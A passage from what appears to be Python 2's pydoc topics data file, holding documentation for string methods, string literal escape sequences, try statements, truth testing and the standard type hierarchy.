not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': u'\nString literals\n***************\n\nString literals are described by the following lexical definitions:\n\n stringliteral ::= [stringprefix](shortstring | longstring)\n stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" | "uR"\n | "b" | "B" | "br" | "Br" | "bR" | "BR"\n shortstring ::= "\'" shortstringitem* "\'" | \'"\' shortstringitem* \'"\'\n longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n | \'"""\' longstringitem* \'"""\'\n shortstringitem ::= shortstringchar | escapeseq\n longstringitem ::= longstringchar | escapeseq\n shortstringchar ::= <any source character except "\\" or newline or the quote>\n longstringchar ::= <any source character except "\\">\n escapeseq ::= "\\" <any ASCII character>\n\nOne syntactic restriction not indicated by these productions is that\nwhitespace is not allowed between the "stringprefix" and the rest of\nthe string literal. The source character set is defined by the\nencoding declaration; it is ASCII if no encoding declaration is given\nin the source file; see section Encoding declarations.\n\nIn plain English: String literals can be enclosed in matching single\nquotes ("\'") or double quotes ("""). They can also be enclosed in\nmatching groups of three single or double quotes (these are generally\nreferred to as *triple-quoted strings*). The backslash ("\\")\ncharacter is used to escape characters that otherwise have a special\nmeaning, such as newline, backslash itself, or the quote character.\nString literals may optionally be prefixed with a letter "\'r\'" or\n"\'R\'"; such strings are called *raw strings* and use different rules\nfor interpreting backslash escape sequences. A prefix of "\'u\'" or\n"\'U\'" makes the string a Unicode string. Unicode strings use the\nUnicode character set as defined by the Unicode Consortium and ISO\n10646. Some additional escape sequences, described below, are\navailable in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ignored in\nPython 2; it indicates that the literal should become a bytes literal\nin Python 3 (e.g. when code is automatically converted with 2to3). A\n"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n\nIn triple-quoted strings, unescaped newlines and quotes are allowed\n(and are retained), except that three unescaped quotes in a row\nterminate the string. (A "quote" is the character used to open the\nstring, i.e. either "\'" or """.)\n\nUnless an "\'r\'" or "\'R\'" prefix is present, escape sequences in\nstrings are interpreted according to rules similar to those used by\nStandard C. The recognized escape sequences are:\n\n+-------------------+-----------------------------------+---------+\n| Escape Sequence | Meaning | Notes |\n+===================+===================================+=========+\n| "\\newline" | Ignored | |\n+-------------------+-----------------------------------+---------+\n| "\\\\" | Backslash ("\\") | |\n+-------------------+-----------------------------------+---------+\n| "\\\'" | Single quote ("\'") | |\n+-------------------+-----------------------------------+---------+\n| "\\"" | Double quote (""") | |\n+-------------------+-----------------------------------+---------+\n| "\\a" | ASCII Bell (BEL) | |\n+-------------------+-----------------------------------+---------+\n| "\\b" | ASCII Backspace (BS) | |\n+-------------------+-----------------------------------+---------+\n| "\\f" | ASCII Formfeed (FF) | |\n+-------------------+-----------------------------------+---------+\n| "\\n" | ASCII Linefeed (LF) | |\n+-------------------+-----------------------------------+---------+\n| "\\N{name}" | Character named *name* in the | |\n| | Unicode database (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\r" | ASCII Carriage Return (CR) | |\n+-------------------+-----------------------------------+---------+\n| "\\t" | ASCII Horizontal Tab (TAB) | |\n+-------------------+-----------------------------------+---------+\n| "\\uxxxx" | Character with 16-bit hex value | (1) |\n| | *xxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\Uxxxxxxxx" | Character with 32-bit hex value | (2) |\n| | *xxxxxxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\v" | ASCII Vertical Tab (VT) | |\n+-------------------+-----------------------------------+---------+\n| "\\ooo" | Character with octal value *ooo* | (3,5) |\n+-------------------+-----------------------------------+---------+\n| "\\xhh" | Character with hex value *hh* | (4,5) |\n+-------------------+-----------------------------------+---------+\n\nNotes:\n\n1. Individual code units which form parts of a surrogate pair can\n be encoded using this escape sequence.\n\n2. Any Unicode character can be encoded this way, but characters\n outside the Basic Multilingual Plane (BMP) will be encoded using a\n surrogate pair if Python is compiled to use 16-bit code units (the\n default).\n\n3. As in Standard C, up to three octal digits are accepted.\n\n4. Unlike in Standard C, exactly two hex digits are required.\n\n5. In a string literal, hexadecimal and octal escapes denote the\n byte with the given value; it is not necessary that the byte\n encodes a character in the source character set. In a Unicode\n literal, these escapes denote a Unicode character with the given\n value.\n\nUnlike Standard C, all unrecognized escape sequences are left in the\nstring unchanged, i.e., *the backslash is left in the string*. (This\nbehavior is useful when debugging: if an escape sequence is mistyped,\nthe resulting output is more easily recognized as broken.) It is also\nimportant to note that the escape sequences marked as "(Unicode only)"\nin the table above fall into the category of unrecognized escapes for\nnon-Unicode string literals.\n\nWhen an "\'r\'" or "\'R\'" prefix is present, a character following a\nbackslash is included in the string without change, and *all\nbackslashes are left in the string*. For example, the string literal\n"r"\\n"" consists of two characters: a backslash and a lowercase "\'n\'".\nString quotes can be escaped with a backslash, but the backslash\nremains in the string; for example, "r"\\""" is a valid string literal\nconsisting of two characters: a backslash and a double quote; "r"\\""\nis not a valid string literal (even a raw string cannot end in an odd\nnumber of backslashes). Specifically, *a raw string cannot end in a\nsingle backslash* (since the backslash would escape the following\nquote character). Note also that a single backslash followed by a\nnewline is interpreted as those two characters as part of the string,\n*not* as a line continuation.\n\nWhen an "\'r\'" or "\'R\'" prefix is used in conjunction with a "\'u\'" or\n"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape sequences are\nprocessed while *all other backslashes are left in the string*. For\nexample, the string literal "ur"\\u0062\\n"" consists of three Unicode\ncharacters: \'LATIN SMALL LETTER B\', \'REVERSE SOLIDUS\', and \'LATIN\nSMALL LETTER N\'. Backslashes can be escaped with a preceding\nbackslash; however, both remain in the string. As a result, "\\uXXXX"\nescape sequences are only recognized when there are an odd number of\nbackslashes.\n', 'subscriptions': u'\nSubscriptions\n*************\n\nA subscription selects an item of a sequence (string, tuple or list)\nor mapping (dictionary) object:\n\n subscription ::= primary "[" expression_list "]"\n\nThe primary must evaluate to an object of a sequence or mapping type.\n\nIf the primary is a mapping, the expression list must evaluate to an\nobject whose value is one of the keys of the mapping, and the\nsubscription selects the value in the mapping that corresponds to that\nkey. (The expression list is a tuple except if it has exactly one\nitem.)\n\nIf the primary is a sequence, the expression (list) must evaluate to a\nplain integer. If this value is negative, the length of the sequence\nis added to it (so that, e.g., "x[-1]" selects the last item of "x".)\nThe resulting value must be a nonnegative integer less than the number\nof items in the sequence, and the subscription selects the item whose\nindex is that value (counting from zero).\n\nA string\'s items are characters. A character is not a separate data\ntype but a string of exactly one character.\n', 'truth': u'\nTruth Value Testing\n*******************\n\nAny object can be tested for truth value, for use in an "if" or\n"while" condition or as operand of the Boolean operations below. The\nfollowing values are considered false:\n\n* "None"\n\n* "False"\n\n* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n\n* any empty sequence, for example, "\'\'", "()", "[]".\n\n* any empty mapping, for example, "{}".\n\n* instances of user-defined classes, if the class defines a\n "__nonzero__()" or "__len__()" method, when that method returns the\n integer zero or "bool" value "False". [1]\n\nAll other values are considered true --- so objects of many types are\nalways true.\n\nOperations and built-in functions that have a Boolean result always\nreturn "0" or "False" for false and "1" or "True" for true, unless\notherwise stated. (Important exception: the Boolean operations "or"\nand "and" always return one of their operands.)\n', 'try': u'\nThe "try" statement\n*******************\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. (This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n', 'types': u'\nThe standard type hierarchy\n***************************\n\nBelow is a list of the types that are built into Python. Extension\nmodules (written in C, Java, or other languages, depending on the\nimplementation) can define additional types. Future versions of\nPython may add types to the type hierarchy (e.g., rational numbers,\nefficiently stored arrays of integers, etc.).\n\nSome of the type descriptions below contain a paragraph listing\n\'special attributes.\' These are attributes that provide access to the\nimplementation and are not intended for general use. Their definition\nmay change in the future.\n\nNone\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name "None". It\n is used to signify the absence of a value in many situations, e.g.,\n it is returned from functions that don\'t explicitly return\n anything. Its truth value is false.\n\nNotImplemented\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "NotImplemented". Numeric methods and rich comparison methods may\n return this value if they do not implement the operation for the\n operands provided. (The interpreter will then try the reflected\n operation, or some other fallback, depending on the operator.) Its\n truth value is true.\n\nEllipsis\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "Ellipsis". It is used to indicate the presence of the "..." syntax\n in a slice. Its truth value is true.\n\n"numbers.Number"\n These are created by numeric literals and returned as results by\n arithmetic operators and arithmetic built-in functions. Numeric\n objects are immutable; once created their value never changes.\n Python numbers are of course strongly related to mathematical\n numbers, but subject to the limitations of numerical representation\n in computers.\n\n Python distinguishes between integers, floating point numbers, and\n complex numbers:\n\n "numbers.Integral"\n These represent elements from the mathematical set of integers\n (positive and negative).\n\n There are three types of integers:\n\n Plain integers\n These represent numbers in the range -2147483648 through\n 2147483647. (The range may be larger on machines with a\n larger natural word size, but not smaller.) When the result\n of an operation would fall outside this range, the result is\n normally returned as a long integer (in some cases, the\n exception "OverflowError" is raised instead). For the\n purpose of shift and mask operations, integers are assumed to\n have a binary, 2\'s complement notation using 32 or more bits,\n and hiding no bits from the user (i.e., all 4294967296\n different bit patterns correspond to different values).\n\n Long integers\n These represent numbers in an unlimited range, subject to\n available (virtual) memory only. For the purpose of shift\n and mask operations, a binary representation is assumed, and\n negative numbers are represented in a variant of 2\'s\n complement which gives the illusion of an infinite string of\n sign bits extending to the left.\n\n Booleans\n These represent the truth values False and True. The two\n objects representing the values "False" and "True" are the\n only Boolean objects. The Boolean type is a subtype of plain\n integers, and Boolean values behave like the values 0 and 1,\n respectively, in almost all contexts, the exception being\n that when converted to a string, the strings ""False"" or\n ""True"" are returned, respectively.\n\n The rules for integer representation are intended to give the\n most meaningful interpretation of shift and mask operations\n involving negative integers and the least surprises when\n switching between the plain and long integer domains. Any\n operation, if it yields a result in the plain integer domain,\n will yield the same result in the long integer domain or when\n using mixed operands. The switch between domains is transparent\n to the programmer.\n\n "numbers.Real" ("float")\n These represent machine-level double precision floating point\n numbers. You are at the mercy of the underlying machine\n architecture (and C or Java implementation) for the accepted\n range and handling of overflow. Python does not support single-\n precision floating point numbers; the savings in processor and\n memory usage that are usually the reason for using these are\n dwarfed by the overhead of using objects in Python, so there is\n no reason to complicate the language with two kinds of floating\n point numbers.\n\n "numbers.Complex"\n These represent complex numbers as a pair of machine-level\n double precision floating point numbers. The same caveats apply\n as for floating point numbers. The real and imaginary parts of a\n complex number "z" can be retrieved through the read-only\n attributes "z.real" and "z.imag".\n\nSequences\n These represent finite ordered sets indexed by non-negative\n numbers. The built-in function "len()" returns the number of items\n of a sequence. When the length of a sequence is *n*, the index set\n contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* is\n selected by "a[i]".\n\n Sequences also support slicing: "a[i:j]" selects all items with\n index *k* such that *i* "<=" *k* "<" *j*. When used as an\n expression, a slice is a sequence of the same type. This implies\n that the index set is renumbered so that it starts at 0.\n\n Some sequences also support "extended slicing" with a third "step"\n parameter: "a[i:j:k]" selects all items of *a* with index *x* where\n "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n\n Sequences are distinguished according to their mutability:\n\n Immutable sequences\n An object of an immutable sequence type cannot change once it is\n created. (If the object contains references to other objects,\n these other objects may be mutable and may be changed; however,\n the collection of objects directly referenced by an immutable\n object cannot change.)\n\n The following types are immutable sequences:\n\n Strings\n The items of a string are characters. There is no separate\n character type; a character is represented by a string of one\n item. Characters represent (at least) 8-bit bytes. The\n built-in functions "chr()" and "ord()" convert between\n characters and nonnegative integers representing the byte\n values. Bytes with the values 0-127 usually represent the\n corresponding ASCII values, but the interpretation of values\n is up to the program. The string data type is also used to\n represent arrays of bytes, e.g., to hold data read from a\n file.\n\n (On systems whose native character set is not ASCII, strings\n may use EBCDIC in their internal representation, provided the\n functions "chr()" and "ord()" implement a mapping between\n ASCII and EBCDIC, and string comparison preserves the ASCII\n order. Or perhaps someone can propose a better rule?)\n\n Unicode\n The items of a Unicode object are Unicode code units. A\n Unicode code unit is represented by a Unicode object of one\n item and can hold either a 16-bit or 32-bit value\n representing a Unicode ordinal (the maximum value for the\n ordinal is given in "sys.maxunicode", and depends on how\n Python is configured at compile time). Surrogate pairs may\n be present in the Unicode object, and will be reported as two\n separate items. The built-in functions "unichr()" and\n "ord()" convert between code units and nonnegative integers\n representing the Unicode ordinals as defined in the Unicode\n Standard 3.0. Conversion from and to other encodings are\n possible through the Unicode method "encode()" and the built-\n in function "unicode()".\n\n Tuples\n The items of a tuple are arbitrary Python objects. Tuples of\n two or more items are formed by comma-separated lists of\n expressions. A tuple of one item (a \'singleton\') can be\n formed by affixing a comma to an expression (an expression by\n itself does not create a tuple, since parentheses must be\n usable for grouping of expressions). An empty tuple can be\n formed by an empty pair of parentheses.\n\n Mutable sequences\n Mutable sequences can be changed after they are created. The\n subscription and slicing notations can be used as the target of\n assignment and "del" (delete) statements.\n\n There are currently two intrinsic mutable sequence types:\n\n Lists\n The items of a list are arbitrary Python objects. Lists are\n formed by placing a comma-separated list of expressions in\n square brackets. (Note that there are no special cases needed\n to form lists of length 0 or 1.)\n\n Byte Arrays\n A bytearray object is a mutable array. They are created by\n the built-in "bytearray()" constructor. Aside from being\n mutable (and hence unhashable), byte arrays otherwise provide\n the same interface and functionality as immutable bytes\n objects.\n\n The extension module "array" provides an additional example of a\n mutable sequence type.\n\nSet types\n These represent unordered, finite sets of unique, immutable\n objects. As such, they cannot be indexed by any subscript. However,\n they can be iterated over, and the built-in function "len()"\n returns the number of items in a set. Common uses for sets are fast\n membership testing, removing duplicates from a sequence, and\n computing mathematical operations such as intersection, union,\n difference, and symmetric difference.\n\n For set elements, the same immutability rules apply as for\n dictionary keys. Note that numeric types obey the normal rules for\n numeric comparison: if two numbers compare equal (e.g., "1" and\n "1.0"), only one of them can be contained in a set.\n\n There are currently two intrinsic set types:\n\n Sets\n These represent a mutable set. They are created by the built-in\n "set()" constructor and can be modified afterwards by several\n methods, such as "add()".\n\n Frozen sets\n These represent an immutable set. They are created by the\n built-in "frozenset()" constructor. As a frozenset is immutable\n and *hashable*, it can be used again as an element of another\n set, or as a dictionary key.\n\nMappings\n These represent finite sets of objects indexed by arbitrary index\n sets. The subscript notation "a[k]" selects the item indexed by "k"\n from the mapping "a"; this can be used in expressions and as the\n target of assignments or "del" statements. The built-in function\n "len()" returns the number of items in a mapping.\n\n There is currently a single intrinsic mapping type:\n\n Dictionaries\n These represent finite sets of objects indexed by nearly\n arbitrary values. The only types of values not acceptable as\n keys are values containing lists or dictionaries or other\n mutable types that are compared by value rather than by object\n identity, the reason being that the efficient implementation of\n dictionaries requires a key\'s hash value to remain constant.\n Numeric types used for keys obey the normal rules for numeric\n comparison: if two numbers compare equal (e.g., "1" and "1.0")\n then they can be used interchangeably to index the same\n dictionary entry.\n\n Dictionaries are mutable; they can be created by the "{...}"\n notation (see section Dictionary displays).\n\n The extension modules "dbm", "gdbm", and "bsddb" provide\n additional examples of mapping types.\n\nCallable types\n These are the types to which the function call operation (see\n section Calls) can be applied:\n\n User-defined functions\n A user-defined function object is created by a function\n definition (see section Function definitions). It should be\n called with an argument list containing the same number of items\n as the function\'s formal parameter list.\n\n Special attributes:\n\n +-------------------------+---------------------------------+-------------+\n | Attribute | Meaning | |\n +=========================+=================================+=============+\n | "__doc__" "func_doc" | The function\'s documentation | Writable |\n | | string, or "None" if | |\n | | unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__name__" "func_name" | The function\'s name. | Writable |\n +-------------------------+---------------------------------+-------------+\n | "__module__" | The name of the module the | Writable |\n | | function was defined in, or | |\n | | "None" if unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__defaults__" | A tuple containing default | Writable |\n | "func_defaults" | argument values for those | |\n | | arguments that have defaults, | |\n | | or "None" if no arguments have | |\n | | a default value. | |\n +-------------------------+---------------------------------+-------------+\n | "__code__" "func_code" | The code object representing | Writable |\n | | the compiled function body. | |\n +-------------------------+---------------------------------+-------------+\n | "__globals__" | A reference to the dictionary | Read-only |\n | "func_globals" | that holds the function\'s | |\n | | global variables --- the global | |\n | | namespace of the module in | |\n | | which the function was defined. | |\n +-------------------------+---------------------------------+-------------+\n | "__dict__" "func_dict" | The namespace supporting | Writable |\n | | arbitrary function attributes. | |\n +-------------------------+---------------------------------+-------------+\n | "__closure__" | "None" or a tuple of cells that | Read-only |\n | "func_closure" | contain bindings for the | |\n | | function\'s free variables. | |\n +-------------------------+---------------------------------+-------------+\n\n Most of the attributes labelled "Writable" check the type of the\n assigned value.\n\n Changed in version 2.4: "func_name" is now writable.\n\n Changed in version 2.6: The double-underscore attributes\n "__closure__", "__code__", "__defaults__", and "__globals__"\n were introduced as aliases for the corresponding "func_*"\n attributes for forwards compatibility with Python 3.\n\n Function objects also support getting and setting arbitrary\n attributes, which can be used, for example, to attach metadata\n to functions. Regular attribute dot-notation is used to get 